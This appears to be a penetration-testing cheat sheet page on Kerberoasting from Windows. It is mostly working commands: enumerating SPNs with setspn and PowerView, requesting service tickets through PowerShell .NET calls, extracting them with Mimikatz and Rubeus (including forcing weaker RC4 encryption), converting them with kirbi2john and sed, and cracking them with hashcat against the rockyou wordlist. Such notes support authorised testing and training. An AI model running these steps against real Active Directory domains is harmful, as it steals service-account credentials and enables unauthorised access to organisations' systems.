Kerberoasting - From Windows
Last updated
Was this helpful?
Last updated
Was this helpful?
C:\> setspn.exe -Q */*
→ lists various available SPNs
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL:1433"
The cmdlet is used to add a .NET framework class to our PowerShell session, which can then be instantiated like any .NET framework object
The AssemblyName
parameter allows us to specify an assembly that contains types that we are interested in using
is a namespace that contains different classes for building security token services
We'll then use the cmdlet to create an instance of a .NET Framework object
We'll use the namespace with the class to create a security token and pass the SPN name to the class to request a Kerberos TGS ticket for the target account in our current logon session
We are requesting TGS tickets for an account and load them into memory to later extract using Mimikatz
PS C:\> setspn.exe -T DOMAIN.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
→ request tickets for all accounts with SPNs set.
Now lets extract tickets from mimikatz
if we do not specify base64 /out:true
, mimikatz will extract the tickets and write them to .kirbi
files
decode this base64 Blob and save into file sqldev.kirbi
then use kirbi2john
to extract Kerberos Ticket.
sed 's/\$krb5tgs\$(.*):\(.*\)/\$krb5tgs\$23\$\1\$\2/' crack_file > sqldev_tgs_hashcat
→ modify the file/hash for Hashcat
**$**krb5tgs$23$sqldev.kirbi$813149fb261549a6a1b38e71a057feeab → it will look something like this
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt
→ finally cracking the hash.
setspn.exe -Q */*
→ list available spns
PS C:\> Import-Module .\PowerView.ps1
→ importing powerview
PS C:\> Get-DomainUser * -spn | select samaccountname
→ getting spn account
PS C:\> Get-DomainUser -Identity username | Get-DomainSPNTicket -Format Hashcat
→ Targeting Specific User
PS C:\> Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
→ Exporting All tickets to csv file
Rubeus does not need us to explicitly set the SPN or the user.
PS C:\> .\Rubeus.exe kerberoast /stats
→ get the stats
PS C:\> .\Rubeus.exe kerberoast
we can add flag /nowrap
so that hash will not be wrapped in any form so it will be easier to crack using hashcat.
also we can use /outfile:filename
to save the ticket, instead of displaying it.
PS C:\> .\Rubeus.exe kerberoast /user:testspn /nowrap
→ for specific user.
we can use /tgtdeleg
flag to specify that we want only RC4 encryption when requesting a new service ticket.
RC4 is easier to crack compared to AES 256 and 128